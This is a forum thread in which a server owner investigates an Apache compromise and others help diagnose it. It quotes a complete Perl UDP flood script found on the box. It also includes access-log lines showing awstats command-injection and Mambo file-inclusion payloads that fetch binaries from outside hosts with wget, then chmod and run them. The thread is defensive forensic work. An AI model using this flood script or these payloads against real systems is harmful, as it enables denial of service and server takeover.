# Exploit in apache (getting hacked)  Help me figure out how??

## Sunthief

Hey all, I found my SUn acting pretty wierd the other day and check out what it was doing.  Heres the results:

```
$ ps -aux

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND

root         1  0.0  0.0   1568   688 ?        S    Feb12   0:20 init [3]  

root         2  0.0  0.0      0     0 ?        S    Feb12   0:00 [keventd]

root         3  0.0  0.0      0     0 ?        SN   Feb12   0:01 [ksoftirqd_CPU0]

root         4  0.0  0.0      0     0 ?        SN   Feb12   0:00 [ksoftirqd_CPU1]

root         5  0.0  0.0      0     0 ?        S    Feb12   0:00 [kswapd]

root         6  0.0  0.0      0     0 ?        S    Feb12   0:00 [bdflush]

root         7  0.0  0.0      0     0 ?        S    Feb12   0:05 [kupdated]

root         9  0.0  0.0      0     0 ?        S    Feb12   0:00 [scsi_eh_0]

root        10  0.0  0.0      0     0 ?        S    Feb12   0:00 [scsi_eh_1]

root        11  0.0  0.0      0     0 ?        S<   Feb12   0:00 [mdrecoveryd]

root        12  0.0  0.0      0     0 ?        S<   Feb12   0:00 [raid1d]

root        13  0.0  0.0      0     0 ?        S<   Feb12   0:00 [raid1d]

root        14  0.0  0.0      0     0 ?        S<   Feb12   0:00 [raid1d]

root        15  0.0  0.0      0     0 ?        S<   Feb12   0:00 [raid1d]

root        16  0.0  0.0      0     0 ?        S    Feb12   0:00 [kjournald]

root        43  0.0  0.0   2432  1336 ?        Ss   Feb12   0:00 /sbin/devfsd /dev

root       136  0.0  0.0      0     0 ?        S<   Feb12   0:08 [raid5d]

root       147  0.0  0.0      0     0 ?        S    Feb12   0:00 [kjournald]

root       148  0.0  0.0      0     0 ?        S    Feb12   0:04 [kjournald]

root       149  0.0  0.0      0     0 ?        S    Feb12   0:04 [kjournald]

root       635  0.0  0.0   1848   824 ?        Ss   Feb12   0:06 metalog [MASTER]                                     

root       636  0.0  0.0   1800   712 ?        S    Feb12   0:00 metalog [KERNEL]                                     

root      1450  0.0  0.0   2840  1568 ?        Ss   Feb12   0:00 /bin/sh /usr/bin/mysqld_safe --defaults-file=/etc/mysql/my.cnf

mysql     1488  0.0  1.3  78752 27016 ?        S    Feb12   0:01 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1502  0.0  1.3  78752 27016 ?        S    Feb12   0:01 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1503  0.0  1.3  78752 27016 ?        S    Feb12   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1504  0.0  1.3  78752 27016 ?        S    Feb12   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1505  0.0  1.3  78752 27016 ?        S    Feb12   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1506  0.0  1.3  78752 27016 ?        S    Feb12   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1556  0.0  1.3  78752 27016 ?        S    Feb12   0:02 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1557  0.0  1.3  78752 27016 ?        S    Feb12   0:01 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1558  0.0  1.3  78752 27016 ?        S    Feb12   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1567  0.0  1.3  78752 27016 ?        S    Feb12   0:02 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

root      1579  0.0  0.0   4440  2016 ?        Ss   Feb12   0:12 /usr/sbin/sshd -o PidFile=/var/run/sshd.pid

clamav    1641  0.0  0.4  12224 10264 ?        Ss   Feb12   0:00 /usr/sbin/clamd

clamav    1643  0.0  0.0   3632  1480 ?        Ss   Feb12   0:00 /usr/bin/freshclam -d

root      1684  0.0  0.0   1552   616 ?        S    Feb12   0:00 /usr/sbin/courierlogger -pid=/var/run/authdaemon.pid -start /usr/lib/courier/courier-authlib/authdaemond

root      1685  0.0  0.0   2272   840 ?        S    Feb12   0:00 /usr/lib/courier/courier-authlib/authdaemond

root      1694  0.0  0.0   2752  1088 ?        S    Feb12   0:03 /usr/lib/courier/courier-authlib/authdaemond

root      1695  0.0  0.0   2752  1088 ?        S    Feb12   0:03 /usr/lib/courier/courier-authlib/authdaemond

root      1696  0.0  0.0   2752  1088 ?        S    Feb12   0:04 /usr/lib/courier/courier-authlib/authdaemond

root      1697  0.0  0.0   2752  1088 ?        S    Feb12   0:04 /usr/lib/courier/courier-authlib/authdaemond

root      1698  0.0  0.0   2752  1088 ?        S    Feb12   0:03 /usr/lib/courier/courier-authlib/authdaemond

root      1738  0.0  0.0   1776   728 ?        S    Feb12   0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/courierlogger -stderrloggername=i

root      1740  0.0  0.0   1560   608 ?        S    Feb12   0:01 /usr/lib/courier-imap/courierlogger imapd

root      1788  0.0  0.0   1776   728 ?        S    Feb12   0:01 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/courierlogger -stderrloggername=p

root      1790  0.0  0.0   1560   608 ?        S    Feb12   0:00 /usr/lib/courier-imap/courierlogger pop3d

root      1899  0.0  0.0   1616   720 ?        S    Feb12   0:21 /sbin/mdadm --monitor --scan

root      1994  0.0  1.0  25648 22224 ?        Ss   Feb12   0:04 /usr/sbin/spamd -d -r /var/run/spamd.pid -m 5 -c -H

root      2048  0.0  0.1   7744  2184 ?        Ss   Feb12   0:03 /usr/lib/postfix/master

postfix   2056  0.0  0.1   7824  2240 ?        S    Feb12   0:00 qmgr -l -t fifo -u

root      2088  0.0  0.0   2256  1040 ?        Ss   Feb12   0:00 /usr/sbin/cron

root      2137  0.0  0.0   3768  1608 ?        Ss   Feb12   0:00 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf

root      2162  0.0  0.0   1920   952 tts/0    Ss+  Feb12   0:00 /sbin/agetty 9600 ttyS0 vt100

root      2163  0.0  1.0  25648 22224 ?        S    Feb12   0:00 spamd child

root      2164  0.0  1.0  25648 22224 ?        S    Feb12   0:00 spamd child

apache   24102 99.9  0.1   6144  3832 ?        R    Feb21 1132:55 /usr/sbin/httpd        

apache   26012  0.0  0.1   6144  3840 ?        S    01:20   0:00 /usr/sbin/httpd        

apache   26013  0.0  0.0   2832  1464 ?        S    01:20   0:00 sh -c perl /tmp/mata.txt 217.146.91.1 50000 2>&1 3>&1

apache   26014 99.9  0.1   4768  2440 ?        R    01:20 368:13 perl /tmp/mata.txt 217.146.91.1 50000

postfix  26428  0.0  0.1   7776  2144 ?        S    06:53   0:00 pickup -l -t fifo -u

root     26467  0.0  0.1   7840  2520 ?        Ss   07:23   0:00 sshd: nicholai [priv]                         

nicholai 26471  0.0  0.1   7840  2608 ?        S    07:24   0:00 sshd: nicholai@pts/0                          

nicholai 26472  0.0  0.0   2848  1800 pts/0    Ss   07:24   0:00 -bash

root     26499  0.0  0.0   3432  1432 pts/0    S    07:25   0:00 su

root     26500  0.0  0.0   2848  1784 pts/0    S+   07:25   0:00 bash

root     26580  0.0  0.1   7840  2520 ?        Ss   07:27   0:00 sshd: nicholai [priv]                         

nicholai 26584  0.7  0.1   7840  2600 ?        S    07:28   0:00 sshd: nicholai@pts/1                          

nicholai 26585  0.3  0.0   2848  1768 pts/1    Ss   07:28   0:00 -bash

root     26589  0.4  0.0   3432  1432 pts/1    S    07:28   0:00 su

root     26590  0.3  0.0   2848  1744 pts/1    S    07:28   0:00 bash

root     26593  0.0  0.0   2920  1160 pts/1    R+   07:28   0:00 ps -aux
```

As u can see someone got the apache user to run a prl script. Heres the contents of the script:

```
nano /tmp/mata.txt 

  GNU nano 1.3.7                                             File: /tmp/mata.txt                                                                                                   

#!/usr/bin/perl

# COE ! LABSEC IRADO

# MATA-MATA-FDC ! MATA TUDO

use Socket;

if (@ARGV < 2) {

    die "[+] labsec udp\n" .

        "[+] perl leet.pl <victim[:victim2:...:victimN]> <tempo> [porta]\n";

}

@sin = map { inet_aton $_ } split /:/, $ARGV[0];

$t   = time +$ARGV[1];

# nazis are comming!!

socket SS, PF_INET, SOCK_DGRAM, 17;

while (1) {

    send SS, 0, 0, sockaddr_in($ARGV[2] || rand 65000, $sin[rand @sin]);

    exit if time >= $t;

}

# ESSA PORRA FOI RIPPADA !

# ORIGINAL BY LIVE

```

I'm not sure how they did it???  I have been using good passwords and have my firewall setup well, checked over my logs and there was no breakin through ssh, so the exploit must of been solely throw apache.....  ANy ideas how they managed to upload a file to /tmp and how thye could of run it useing the apache user???  PLus I cant seem to kill those processes. I just have her unplugged for now, would rather keep it all going just to see how they did it so prevent it in the future.

----------

## msalerno

Who is the owner of the file and what's the timestamp?

Have you been through your apache logs with the above information to confirm that it is apache?

----------

## Sunthief

here is the owner & permissions on the file:

```
-rw-r--r--   1 apache apache   517 Feb  9  2005
```

here is some interesting Apache error logs:

```
at /var/log/apache2/error_log

[Mon Dec 26 21:02:16 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Mon Dec 26 21:02:16 2005] [notice] Digest: generating secret for digest authentication ...

[Mon Dec 26 21:02:16 2005] [notice] Digest: done

[Mon Dec 26 21:02:16 2005] [notice] Apache configured -- resuming normal operations

[Mon Dec 26 22:40:05 2005] [notice] caught SIGTERM, shutting down

[Mon Dec 26 23:09:37 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Mon Dec 26 23:09:37 2005] [notice] Digest: generating secret for digest authentication ...

[Mon Dec 26 23:09:37 2005] [notice] Digest: done

[Mon Dec 26 23:09:37 2005] [notice] Apache configured -- resuming normal operations

[Mon Dec 26 23:40:18 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/awstats

[Mon Dec 26 23:40:19 2005] [error] [client 195.28.196.79] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats.pl

[Mon Dec 26 23:40:21 2005] [error] [client 195.28.196.79] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats

[Mon Dec 26 23:40:23 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/xmlrpc.php

[Mon Dec 26 23:40:24 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/blog

[Mon Dec 26 23:40:26 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/blog

[Mon Dec 26 23:40:27 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/blogs

[Mon Dec 26 23:40:28 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/drupal

[Mon Dec 26 23:40:30 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/phpgroupware

[Mon Dec 26 23:40:31 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/wordpress

[Mon Dec 26 23:40:32 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/xmlrpc.php

[Mon Dec 26 23:40:33 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/xmlrpc

[Mon Dec 26 23:40:35 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/xmlsrv

[Tue Dec 27 00:59:28 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 01:08:17 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 01:08:17 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 01:08:54 2005] [notice] Digest: done

[Tue Dec 27 01:08:54 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 09:49:20 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 10:37:10 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 10:37:10 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 10:37:10 2005] [notice] Digest: done

[Tue Dec 27 10:37:10 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 10:44:51 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 10:44:52 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 10:44:52 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 10:44:52 2005] [notice] Digest: done

[Tue Dec 27 10:44:52 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 10:46:37 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 10:46:38 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 10:46:38 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 10:46:38 2005] [notice] Digest: done

[Tue Dec 27 10:46:38 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 10:47:51 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 10:47:52 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 10:47:52 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 10:47:52 2005] [notice] Digest: done

[Tue Dec 27 10:47:52 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 10:47:54 2005] [error] [client 192.168.1.2] File does not exist: /usr/htdocs

[Tue Dec 27 10:47:55 2005] [error] [client 192.168.1.2] File does not exist: /usr/htdocs

[Tue Dec 27 10:50:36 2005] [error] [client 192.168.1.2] File does not exist: /usr/htdocs

[Tue Dec 27 10:53:43 2005] [error] [client 192.168.1.2] File does not exist: /usr/htdocs

[Tue Dec 27 12:51:12 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 12:51:13 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 12:51:13 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 12:51:41 2005] [notice] Digest: done

[Tue Dec 27 12:51:41 2005] [error] [client 192.168.1.2] File does not exist: /usr/htdocs

[Tue Dec 27 12:51:41 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 12:56:20 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 12:56:21 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 12:56:21 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 12:56:56 2005] [notice] Digest: done

[Tue Dec 27 12:56:56 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 13:01:25 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 13:01:27 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 13:01:27 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 13:01:51 2005] [notice] Digest: done

[Tue Dec 27 13:01:51 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 13:08:07 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 13:11:13 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 13:11:13 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 13:11:13 2005] [notice] Digest: done

[Tue Dec 27 13:11:13 2005] [notice] Apache configured -- resuming normal operations

[Wed Dec 28 01:24:06 2005] [notice] caught SIGTERM, shutting down

[Wed Dec 28 07:08:43 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Wed Dec 28 07:08:43 2005] [notice] Digest: generating secret for digest authentication ...

[Wed Dec 28 07:08:43 2005] [notice] Digest: done

[Wed Dec 28 07:08:43 2005] [notice] Apache configured -- resuming normal operations

[Wed Dec 28 07:43:17 2005] [notice] caught SIGTERM, shutting down

[Wed Dec 28 07:43:19 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Wed Dec 28 07:43:19 2005] [notice] Digest: generating secret for digest authentication ...

[Wed Dec 28 07:43:19 2005] [notice] Digest: done

[Wed Dec 28 07:43:19 2005] [notice] Apache configured -- resuming normal operations

[Wed Dec 28 07:58:00 2005] [notice] caught SIGTERM, shutting down

[Wed Dec 28 07:58:03 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Wed Dec 28 07:58:03 2005] [notice] Digest: generating secret for digest authentication ...

[Wed Dec 28 07:58:04 2005] [notice] Digest: done

[Wed Dec 28 07:58:04 2005] [notice] Apache configured -- resuming normal operations

[Thu Dec 29 13:39:39 2005] [notice] caught SIGTERM, shutting down

[Thu Dec 29 13:39:41 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Thu Dec 29 13:39:42 2005] [notice] Digest: generating secret for digest authentication ...

[Thu Dec 29 13:39:42 2005] [notice] Digest: done

[Thu Dec 29 13:39:42 2005] [notice] Apache configured -- resuming normal operations
```

I don't remember turning on suExec, so i guess that's how they did it. 

I'll keep looking in the logs for the actual attack, is there anything that I can look for for an attempt to su in the logs??  The log files are huge as u can see I have logs all the way back to Dec.

Also I do have PHP enabled.  Any Ideas on why I cant kill the processes???  right now I have the network cable unplugged so I'm willing to leave it up and running till I can stop this from happening again, I'm sure its the Suexec for Apache that's my security hole but I'd like to know how they exploited it exactly and confirm my suspicions.

----------

## ben-xo

you've been hacked through a web application on your server. Common attack vectors (that is, buggy programs) that are used in this way are

* old versions of "wordpress"

* old versions of "gallery"

* old versions of "phpBB"

* formmail

* old versions of "cubecart"

* many other old versions of things...

* just about anything which was written by an amateur, if you have register_globals on in your php.ini

so... time to audit your web applications.

----------

## Sunthief

Is there anyway to track down which one did it.  I'm all for updateing all my webservices but I really prefer to confirm which one did it so I know for sure that it is fixed.  I really hate it when I fix a problem and I'm not sure which fix did it.  I am running several phpbb's but I am decently sure they are all up to date I will go check them out.  How does an attack happen to an older version of phpbb, is there any clues I can look for to confirm this???  Thanks for the help

----------

## BlackEdder

The /tmp file tells you that you were hacked on 9 februari in 2005. You can probably even find out the exact time this file was created. This gives you a pretty narrow timeframe to look for in your logs. If you can't find it in there, then it will be almost impossible to be sure what happened. 

More important is probably to find out if they did any more damage. You could emerge/run chkrootkit and see if that finds something....

----------

## xces

 *Sunthief wrote:*   

> Is there anyway to track down which one did it.

 

Yes, check your access_log files for suspicious requests (e. g. requests involving the strings "wget", "perl" or "curl").

Also check the installed scripts (some already mentioned by ben-xo) if any exploits are known for them. Bugtraq, Full-Disclosure and so on are good sources of information.

----------

## Sunthief

OK heres some more info, heres the exact time the file was made:

```
-rw-r--r--   1 apache apache   517 2005-02-09 02:18:38.000000000 -0800
```

and heres the access_logs close to that time:

```
58.69.13.196 - - [09/Feb/2006:01:29:47 -0800] "GET /images/spirit/wolftrack1.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:01:29:47 -0800] "GET /images/spirit/wolftrack2.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:01:29:47 -0800] "GET /images/spirit/woodpecker.gif HTTP/1.1" 304 -

64.242.88.10 - - [09/Feb/2006:01:32:14 -0800] "GET /phpBB2/search.php?search_id=unanswered&sid=c460d02353c5d3ba480e7ab11beb1$

64.114.170.242 - - [09/Feb/2006:01:48:28 -0800] "GET / HTTP/1.1" 304 -

64.242.88.10 - - [09/Feb/2006:01:49:49 -0800] "GET /phpBB2/viewtopic.php?p=1322&sid=c460d02353c5d3ba480e7ab11beb182f HTTP/1.$

64.114.170.242 - - [09/Feb/2006:01:50:01 -0800] "GET / HTTP/1.1" 304 -

65.214.44.60 - - [09/Feb/2006:01:51:30 -0800] "GET /Designed/Desktop%20Solutions%20Inc/directions.htm HTTP/1.0" 404 309

64.114.170.242 - - [09/Feb/2006:01:53:54 -0800] "GET / HTTP/1.1" 304 -

64.114.170.242 - - [09/Feb/2006:01:55:08 -0800] "GET / HTTP/1.1" 304 -

64.114.170.242 - - [09/Feb/2006:01:58:25 -0800] "GET / HTTP/1.1" 304 -

64.114.170.242 - - [09/Feb/2006:02:06:25 -0800] "GET / HTTP/1.1" 304 -

192.168.1.1 - - [09/Feb/2006:02:08:20 -0800] "GET /wpad.dat HTTP/1.1" 404 268

192.168.1.1 - - [09/Feb/2006:02:08:20 -0800] "GET /wpad.dat HTTP/1.1" 404 268

64.242.88.10 - - [09/Feb/2006:02:25:55 -0800] "GET /phpBB2/profile.php?mode=viewprofile&u=36&sid=c460d02353c5d3ba480e7ab11be$

139.18.2.216 - - [09/Feb/2006:02:30:53 -0800] "GET /robots.txt HTTP/1.1" 404 278

64.242.88.10 - - [09/Feb/2006:02:44:36 -0800] "GET /phpBB2/viewtopic.php?p=1315&sid=c460d02353c5d3ba480e7ab11beb182f HTTP/1.$

58.69.13.196 - - [09/Feb/2006:02:52:58 -0800] "GET /images/spirit/woodpecker.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:02:52:59 -0800] "GET /images/spirit/wolftrack2.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:02:53:00 -0800] "GET /images/spirit/wolftrack1.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:02:53:01 -0800] "GET /images/spirit/wolf.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:02:53:02 -0800] "GET /images/spirit/whaletale.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:02:53:03 -0800] "GET /images/spirit/whale.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:02:53:04 -0800] "GET /images/spirit/turtle2.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:02:53:05 -0800] "GET /images/spirit/turtle1.gif HTTP/1.1" 304 -

```

Ok and heres the Error logs during that time:

```
[Thu Feb 09 02:08:20 2006] [error] [client 192.168.1.1] File does not exist: /var/www/sunthief/wpad.dat

[Thu Feb 09 02:08:20 2006] [error] [client 192.168.1.1] File does not exist: /var/www/sunthief/wpad.dat

[Thu Feb 09 02:30:53 2006] [error] [client 139.18.2.216] File does not exist: /var/www/girlguides/robots.txt             

[Thu Feb 09 03:24:13 2006] [error] [client 66.154.102.36] File does not exist: /var/www/boundarypaintball/robots.txt

[Thu Feb 09 03:24:43 2006] [error] [client 217.151.96.164] script '/var/www/sunthief/index2.php' not found or unable to stat 

[Thu Feb 09 03:24:44 2006] [error] [client 217.151.96.164] script '/var/www/sunthief/index.php' not found or unable to stat

[Thu Feb 09 03:24:45 2006] [error] [client 217.151.96.164] File does not exist: /var/www/sunthief/mambo

[Thu Feb 09 03:24:46 2006] [error] [client 217.151.96.164] File does not exist: /var/www/sunthief/cvs

[Thu Feb 09 03:24:47 2006] [error] [client 217.151.96.164] script '/var/www/sunthief/xmlrpc.php' not found or unable to stat 

[Thu Feb 09 03:24:49 2006] [error] [client 217.151.96.164] File does not exist: /var/www/sunthief/drupal

[Thu Feb 09 03:24:51 2006] [error] [client 217.151.96.164] File does not exist: /var/www/sunthief/phpgroupware

[Thu Feb 09 03:24:52 2006] [error] [client 217.151.96.164] File does not exist: /var/www/sunthief/wordpress

```

Looks like someone was trying to run scrpts there?????

----------

## int2str

Are you running phpBB on your server?

Edit:

I see, you are. That is most likely the attack vector.

Cheers,

    Andre

----------

## rev138

What version of phpBB do you run?

----------

## Sunthief

I have several copies of phpbb on my server, I'll go throw and check each one to see what version it is.  How does one exploit the phpbb??  I just copied my whole www directory off of another computer and now I cant just do an emerge update but I would liek to in the future, is there a way to set up emerge to work with previsioly installed versions, as well as multiple versions, so I can updae when ever new versions come out??

----------

## BlackEdder

The logs you showed are from a year after the tmp file was created

----------

## Sunthief

U know your right, there is no way it could of been created on feb 2005 since I havnt had the computer that long.......  Must of changed the date stamp. grrrrr.  How the hell oculd a security hole in phpbb allow a incorrect datestamp?????

----------

## Maedhros

It might not be phpBB - I know awstats had at least one pretty destructive security hole a while ago... 

Moved from Other Things Gentoo to Networking & Security.

----------

## Sunthief

Oh sorry for posting in the wrong spot.  I grep'd for wget in my access log and I do see a lot of suspicios behavior, its a lot to go through though maybe you guys can make more sens of it then me.  I'm not sure how awstats got on my system int he first place, is it added with another common package?

anyway heres what the grep results were and a confirmation that I never installed that awstats:

[code:1:706a4abe43]/var/log/apache2 $ grep wget access_log 

195.28.196.79 - - [26/Dec/2005:23:40:18 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 280

195.28.196.79 - - [26/Dec/2005:23:40:19 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 280

195.28.196.79 - - [26/Dec/2005:23:40:21 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 288

212.170.242.208 - - [03/Jan/2006:13:14:51 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

212.170.242.208 - - [03/Jan/2006:13:14:52 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

212.170.242.208 - - [03/Jan/2006:13:14:54 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 286

212.170.242.208 - - [03/Jan/2006:13:14:55 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 270

212.170.242.208 - - [03/Jan/2006:13:14:56 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 269

212.170.242.208 - - [03/Jan/2006:13:14:58 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 276

212.170.242.208 - - [03/Jan/2006:13:14:59 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 274

212.170.242.208 - - [03/Jan/2006:13:15:00 -0800] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 280

62.175.253.180 - - [03/Jan/2006:16:31:03 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

62.175.253.180 - - [03/Jan/2006:16:31:04 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

62.175.253.180 - - [03/Jan/2006:16:31:05 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

